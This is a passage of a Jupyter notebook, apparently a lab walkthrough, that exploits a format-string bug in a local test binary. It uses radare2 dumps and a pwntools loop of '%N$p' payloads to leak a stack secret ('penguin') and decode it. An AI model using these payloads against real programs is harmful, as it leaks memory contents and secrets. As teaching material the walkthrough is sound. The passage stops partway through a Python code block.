\u001b[36m \u001b[0m\u001b[32m0x004006a2\u001b[0m \u001b[32m00\u001b[32m00\u001b[0m \u001b[33madd byte\u001b[36m \u001b[0m[\u001b[36mrax\u001b[0m]\u001b[36m\u001b[0m,\u001b[36m\u001b[36m al\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m;-- \u001b[36msection..fini:\u001b[0m\n", "\u001b[36m/ \u001b[0m\u001b[31m(fcn) sym._fini\u001b[0m 9\n", "\u001b[36m| \u001b[0m \u001b[31m sym._fini\u001b[0m ();\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004006a4\u001b[0m 
\u001b[33m48\u001b[37m83\u001b[37mec\u001b[37m08\u001b[0m \u001b[33msub\u001b[36m rsp\u001b[0m,\u001b[36m\u001b[36m \u001b[33m8\u001b[0m\u001b[0m\u001b[0m \u001b[37m; [14] --r-x section size 9 named .fini\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004006a8\u001b[0m \u001b[33m48\u001b[37m83\u001b[37mc4\u001b[37m08\u001b[0m \u001b[33madd\u001b[36m rsp\u001b[0m,\u001b[36m\u001b[36m \u001b[33m8\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m\\ \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004006ac\u001b[0m \u001b[37mc3\u001b[0m \u001b[31mret\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m;-- \u001b[36msection_end..fini:\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006ad\u001b[0m \u001b[32m00\u001b[32m00\u001b[0m \u001b[33madd byte\u001b[36m \u001b[0m[\u001b[36mrax\u001b[0m]\u001b[36m\u001b[0m,\u001b[36m\u001b[36m al\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006af\u001b[0m ~ \u001b[32m00\u001b[37m01\u001b[0m \u001b[33madd byte\u001b[36m \u001b[0m[\u001b[36mrcx\u001b[0m]\u001b[36m\u001b[0m,\u001b[36m\u001b[36m al\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m;-- \u001b[36msection..rodata:\u001b[0m\n", " \u001b[36m \u001b[0m;-- \u001b[36m_IO_stdin_used:\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006b0\u001b[0m \u001b[37m01\u001b[32m00\u001b[0m \u001b[33madd dword\u001b[36m \u001b[0m[\u001b[36mrax\u001b[0m]\u001b[36m\u001b[0m,\u001b[36m\u001b[36m eax\u001b[0m\u001b[0m\u001b[0m \u001b[37m; [15] --r-- section size 4 named .rodata\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006b2\u001b[0m \u001b[37m02\u001b[32m00\u001b[0m \u001b[33madd\u001b[36m al\u001b[0m,\u001b[36m byte\u001b[36m \u001b[0m[\u001b[36mrax\u001b[0m]\u001b[36m\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m;-- \u001b[36msection_end..rodata:\u001b[0m\n", " \u001b[36m \u001b[0m;-- \u001b[36msection..eh_frame_hdr:\u001b[0m\n", " \u001b[36m \u001b[0m;-- \u001b[36msection.GNU_EH_FRAME:\u001b[0m\n", " \u001b[36m \u001b[0m;-- 
\u001b[36m__GNU_EH_FRAME_HDR:\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006b4\u001b[0m \u001b[37m01\u001b[37m1b\u001b[0m \u001b[33madd dword\u001b[36m \u001b[0m[\u001b[36mrbx\u001b[0m]\u001b[36m\u001b[0m,\u001b[36m\u001b[36m ebx\u001b[0m\u001b[0m\u001b[0m \u001b[37m; [35] m-r-- section size 60 named GNU_EH_FRAME\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006b6\u001b[0m \u001b[37m03\u001b[33m3b\u001b[0m \u001b[33madd\u001b[36m edi\u001b[0m,\u001b[36m dword\u001b[36m \u001b[0m[\u001b[36mrbx\u001b[0m]\u001b[36m\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006b8\u001b[0m \u001b[33m38\u001b[32m00\u001b[0m \u001b[36mcmp byte\u001b[36m \u001b[0m[\u001b[36mrax\u001b[0m]\u001b[36m\u001b[0m,\u001b[36m\u001b[36m al\u001b[0m\u001b[0m\u001b[31m ; [0x2:1]=255\u001b[31m ; 2\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006ba\u001b[0m \u001b[32m00\u001b[32m00\u001b[0m \u001b[33madd byte\u001b[36m \u001b[0m[\u001b[36mrax\u001b[0m]\u001b[36m\u001b[0m,\u001b[36m\u001b[36m al\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006bc\u001b[0m \u001b[37m06\u001b[0m \u001b[1;31minvalid\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006bd\u001b[0m \u001b[32m00\u001b[32m00\u001b[0m \u001b[33madd byte\u001b[36m \u001b[0m[\u001b[36mrax\u001b[0m]\u001b[36m\u001b[0m,\u001b[36m\u001b[36m al\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006bf\u001b[0m \u001b[32m00\u001b[37mcc\u001b[0m \u001b[33madd\u001b[36m ah\u001b[0m,\u001b[36m\u001b[36m cl\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006c1\u001b[0m \u001b[37mfd\u001b[0m \u001b[37mstd\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006c2\u001b[0m \u001b[31mff\u001b[0m \u001b[1;31minvalid\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006c3\u001b[0m \u001b[31mff\u001b[37m94\u001b[32m00\u001b[32m00\u001b[32m00\u001b[37m0c\u001b[37m.\u001b[0m \u001b[1;32mcall qword [rax + rax - 
0x1f40000]\u001b[0m\u001b[0m\n", "\n" ] } ], "source": [ "print(r2.cmd(\"px @ rsp\"))\n", "print(r2.cmd(\"dr\"))\n", "print(r2.cmd(\"pd\"))" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "Looking at the output from above, the qword holding the secret sits at 0x7ffcf638f638 (bytes `00 70 65 6e 67 75 69 6e`, i.e. `\\0penguin`) while rsp is at 0x7ffcf638f620 at the moment `printf` is called: the secret is 0x18 (24) bytes above the stack pointer. The absolute addresses differ between runs because of ASLR, but the offset from rsp does not, which is what keeps `px @ rsp+24` and the `%9$p` index used below stable. With the format string bug, if we read 32 bytes off the stack, the last 8 will correspond to our secret." ] }, { "cell_type": "code", "execution_count": 8, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF\n", "\u001b[32m0x7ffcf638f638\u001b[0m \u001b[32m00\u001b[0m\u001b[33m70\u001b[0m \u001b[33m65\u001b[0m\u001b[33m6e\u001b[0m \u001b[33m67\u001b[0m\u001b[33m75\u001b[0m \u001b[33m69\u001b[0m\u001b[33m6e\u001b[0m \u001b[33m61\u001b[0m\u001b[33m61\u001b[0m \u001b[33m61\u001b[0m\u001b[33m61\u001b[0m \u001b[33m62\u001b[0m\u001b[33m62\u001b[0m \u001b[33m62\u001b[0m\u001b[33m62\u001b[0m \u001b[32m.\u001b[0m\u001b[33mp\u001b[0m\u001b[33me\u001b[0m\u001b[33mn\u001b[0m\u001b[33mg\u001b[0m\u001b[33mu\u001b[0m\u001b[33mi\u001b[0m\u001b[33mn\u001b[0m\u001b[33ma\u001b[0m\u001b[33ma\u001b[0m\u001b[33ma\u001b[0m\u001b[33ma\u001b[0m\u001b[33mb\u001b[0m\u001b[33mb\u001b[0m\u001b[33mb\u001b[0m\u001b[33mb\u001b[0m\n", "\u001b[32m0x7ffcf638f648\u001b[0m \u001b[33m63\u001b[0m\u001b[33m63\u001b[0m \u001b[33m63\u001b[0m\u001b[33m63\u001b[0m \u001b[33m64\u001b[0m\u001b[33m64\u001b[0m \u001b[33m64\u001b[0m\u001b[33m64\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m 
\u001b[33mc\u001b[0m\u001b[33mc\u001b[0m\u001b[33mc\u001b[0m\u001b[33mc\u001b[0m\u001b[33md\u001b[0m\u001b[33md\u001b[0m\u001b[33md\u001b[0m\u001b[33md\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f658\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f668\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f678\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m 
\u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f688\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f698\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37mfc\u001b[0m\u001b[36m7f\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[36m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f6a8\u001b[0m \u001b[32m00\u001b[0m\u001b[37mdc\u001b[0m \u001b[33m7c\u001b[0m\u001b[37mdd\u001b[0m 
\u001b[32m00\u001b[0m\u001b[37m9c\u001b[0m \u001b[33m64\u001b[0m\u001b[33m5a\u001b[0m \u001b[33m30\u001b[0m\u001b[37m06\u001b[0m \u001b[33m40\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m|\u001b[0m\u001b[37m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33md\u001b[0m\u001b[33mZ\u001b[0m\u001b[33m0\u001b[0m\u001b[37m.\u001b[0m\u001b[33m@\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f6b8\u001b[0m \u001b[37m97\u001b[0m\u001b[37mcb\u001b[0m \u001b[37me3\u001b[0m\u001b[37mc0\u001b[0m \u001b[33m3b\u001b[0m\u001b[36m7f\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37m02\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m;\u001b[0m\u001b[36m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f6c8\u001b[0m \u001b[37m98\u001b[0m\u001b[37mf7\u001b[0m \u001b[33m38\u001b[0m\u001b[37mf6\u001b[0m \u001b[37mfc\u001b[0m\u001b[36m7f\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[37m80\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37m02\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m8\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[36m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", 
"\u001b[32m0x7ffcf638f6d8\u001b[0m \u001b[37ma7\u001b[0m\u001b[37m05\u001b[0m \u001b[33m40\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m@\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f6e8\u001b[0m \u001b[32m00\u001b[0m\u001b[37m03\u001b[0m \u001b[37mf0\u001b[0m\u001b[37m9f\u001b[0m \u001b[33m51\u001b[0m\u001b[37m10\u001b[0m \u001b[37mec\u001b[0m\u001b[33m2b\u001b[0m \u001b[37mc0\u001b[0m\u001b[37m04\u001b[0m \u001b[33m40\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33mQ\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m+\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m@\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f6f8\u001b[0m \u001b[37m90\u001b[0m\u001b[37mf7\u001b[0m \u001b[33m38\u001b[0m\u001b[37mf6\u001b[0m \u001b[37mfc\u001b[0m\u001b[36m7f\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m 
\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m8\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[36m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f708\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[37m03\u001b[0m \u001b[37m10\u001b[0m\u001b[33m7e\u001b[0m \u001b[37ma0\u001b[0m\u001b[37mfc\u001b[0m \u001b[37m15\u001b[0m\u001b[37md4\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m~\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\n", "\u001b[32m0x7ffcf638f718\u001b[0m \u001b[32m00\u001b[0m\u001b[37m03\u001b[0m \u001b[37m0e\u001b[0m\u001b[37m05\u001b[0m \u001b[37m16\u001b[0m\u001b[37m91\u001b[0m \u001b[37m9b\u001b[0m\u001b[37md5\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37mfc\u001b[0m\u001b[36m7f\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[36m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f728\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m 
\u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\n" ] } ], "source": [ "print(r2.cmd(\"px @ rsp+24\"))" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "Ooooo, OK so we see our secret, \"penguin\", is on the stack. Next, I iterate across my parameters using `%i$p`, where \"i\" is the index of my parameter. Once I hit the 9th parameter, I find my secret. The index follows from the x86-64 SysV calling convention: `printf` gets the format string in rdi and reads the next five variadic slots from rsi, rdx, rcx, r8 and r9, so `%6$p` is the first qword on the stack (at the caller's rsp) and `%9$p` is rsp+0x18, the very qword that `px @ rsp+24` showed. Since the offset is relative to rsp, the index stays valid across runs even though ASLR moves the absolute addresses. The \"skipped\" entries are slots whose `%p` output cannot be unhexlified as printed: `(nil)` for a NULL value, or an odd number of hex digits when the value has leading zero nibbles (0x1, 0x4 and the like):" ] }, { "cell_type": "code", "execution_count": 9, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "[x] Starting local process './vulnerable'\n", "Starting local process './vulnerable'\n", "[+] Starting local process './vulnerable': pid 21169\n", "Starting local process './vulnerable': pid 21169\n", "[*] Process './vulnerable' stopped with exit code 0 (pid 21169)\n", "Process './vulnerable' stopped with exit code 0 (pid 21169)\n", "1 skipped...\n", "[x] Starting local process './vulnerable'\n", "Starting local process './vulnerable'\n", "[+] Starting local process './vulnerable': pid 21170\n", "Starting local process './vulnerable': pid 21170\n", "[*] Process './vulnerable' stopped with exit code 0 (pid 21170)\n", "Process './vulnerable' stopped with exit code 0 (pid 21170)\n", "2 skipped...\n", "[x] Starting local process './vulnerable'\n", "Starting local process './vulnerable'\n", "[+] Starting local process './vulnerable': pid 21171\n", "Starting local process './vulnerable': pid 21171\n", "[*] Process './vulnerable' stopped with exit code 0 (pid 21171)\n", "Process './vulnerable' stopped with exit code 0 (pid 21171)\n", "3: ,��8�\n", "[x] Starting local process 
'./vulnerable'\n", "Starting local process './vulnerable'\n", "[+] Starting local process './vulnerable': pid 21172\n", "Starting local process './vulnerable': pid 21172\n", "[*] Process './vulnerable' stopped with exit code 0 (pid 21172)\n", "Process './vulnerable' stopped with exit code 0 (pid 21172)\n", "4 skipped...\n", "[x] Starting local process './vulnerable'\n", "Starting local process './vulnerable'\n", "[+] Starting local process './vulnerable': pid 21173\n", "Starting local process './vulnerable': pid 21173\n", "[*] Process './vulnerable' stopped with exit code 0 (pid 21173)\n", "Process './vulnerable' stopped with exit code 0 (pid 21173)\n", "5: 1\u0003\u0011\u001d", "�\n", "[x] Starting local process './vulnerable'\n", "Starting local process './vulnerable'\n", "[+] Starting local process './vulnerable': pid 21174\n", "Starting local process './vulnerable': pid 21174\n", "[*] Process './vulnerable' stopped with exit code 0 (pid 21174)\n", "Process './vulnerable' stopped with exit code 0 (pid 21174)\n", "6: �pX\u0016�\n", "[x] Starting local process './vulnerable'\n", "Starting local process './vulnerable'\n", "[+] Starting local process './vulnerable': pid 21175\n", "Starting local process './vulnerable': pid 21175\n", "[*] Process './vulnerable' stopped with exit code 0 (pid 21175)\n", "Process './vulnerable' stopped with exit code 0 (pid 21175)\n", "7 skipped...\n", "[x] Starting local process './vulnerable'\n", "Starting local process './vulnerable'\n", "[+] Starting local process './vulnerable': pid 21176\n", "Starting local process './vulnerable': pid 21176\n", "[*] Process './vulnerable' stopped with exit code 0 (pid 21176)\n", "Process './vulnerable' stopped with exit code 0 (pid 21176)\n", "8 skipped...\n", "[x] Starting local process './vulnerable'\n", "Starting local process './vulnerable'\n", "[+] Starting local process './vulnerable': pid 21177\n", "Starting local process './vulnerable': pid 21177\n", "[*] Process './vulnerable' stopped 
with exit code 0 (pid 21177)\n", "Process './vulnerable' stopped with exit code 0 (pid 21177)\n", "9: niugnep\u0000\n" ] } ], "source": [ "from pwn import *\n", "import binascii\n", "\n", "# %N$p prints the Nth variadic argument as a pointer; sweep N to find the\n", "# slot holding the secret. Slots 1-5 come from rsi, rdx, rcx, r8 and r9,\n", "# slot 6 onwards from the stack starting at rsp.\n", "for i in range(1, 10):\n", "    cur_process = process([\"./vulnerable\", \"%{}$p\".format(i)])\n", "    output = cur_process.recv(1024)\n", "    try:\n", "        # unhexlify fails on '(nil)' or on an odd number of hex digits\n", "        print(\"{}: {}\".format(i, binascii.unhexlify(output.replace(\"0x\", \"\"))))\n", "    except Exception:\n", "        print(\"{} skipped...\".format(i))" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "Now we have the secret - we need to unjumble it! `%p` printed the qword as a number, most significant byte first, while the string sits in memory little-endian, so the bytes come out reversed: undoing that is a plain reversal." ] }, { "cell_type": "code", "execution_count": 10, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "[x] Starting local process './vulnerable'\n", "Starting local process './vulnerable'\n", "[+] Starting local process './vulnerable': pid 21178\n", "Starting local process './vulnerable': pid 21178\n", "[*] Process './vulnerable' stopped with exit code 0 (pid 21178)\n", "Process './vulnerable' stopped with exit code 0 (pid 21178)\n", "\u0000penguin\n" ] } ], "source": [ "cur_process = process([\"./vulnerable\", \"%9$p\"])\n", "# unhexlify yields the bytes most significant first; reversing restores memory order\n", "jumbled = binascii.unhexlify(cur_process.recv(1024).replace(\"0x\", \"\"))\n", "print(jumbled[::-1])" ] }, { "cell_type": "code", "execution_count": 11, "metadata": {}, "outputs": [], "source": [ "r2.quit()" ] } ], "metadata": { "kernelspec": { "display_name": "Python 2", "language": "python", "name": "python2" }, "language_info": { "codemirror_mode": { "name": "ipython", "version": 2 }, "file_extension": ".py", "mimetype": "text/x-python", "name": "python", "nbconvert_exporter": "python", "pygments_lexer": "ipython2", "version": "2.7.15+" } }, "nbformat": 4, "nbformat_minor": 2 }
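Added example, appended after the notebook and not part of it: the parameter-index arithmetic and the decoding step from the `%i$p` sweep and the unjumble cell, written out as reusable Python 3 functions (the notebook itself runs a Python 2 kernel) so they can be checked without the `vulnerable` binary. `stack_offset_to_index` encodes the x86-64 SysV rule (format string in rdi, five variadic slots in rsi, rdx, rcx, r8 and r9, then the stack from the caller's rsp) that makes `%9$p` read rsp+0x18; `decode_pointer_leak` turns whatever `%p` printed into the slot's bytes in memory order and handles the two cases the sweep had to skip, `(nil)` and an odd number of hex digits. `SAMPLE_LEAKS` is constructed: slots 1 to 5 are the register values from the `dr` dump above, slot 9 is the leaked qword that unhexlified to `niugnep\0`, and slots 6 to 8 are invented stand-ins; nothing is executed against a real process here.

```python
"""Format-string leak helpers: %N$p index arithmetic and little-endian decoding.

Added example for the %i$p sweep and the unjumble step; not code from the
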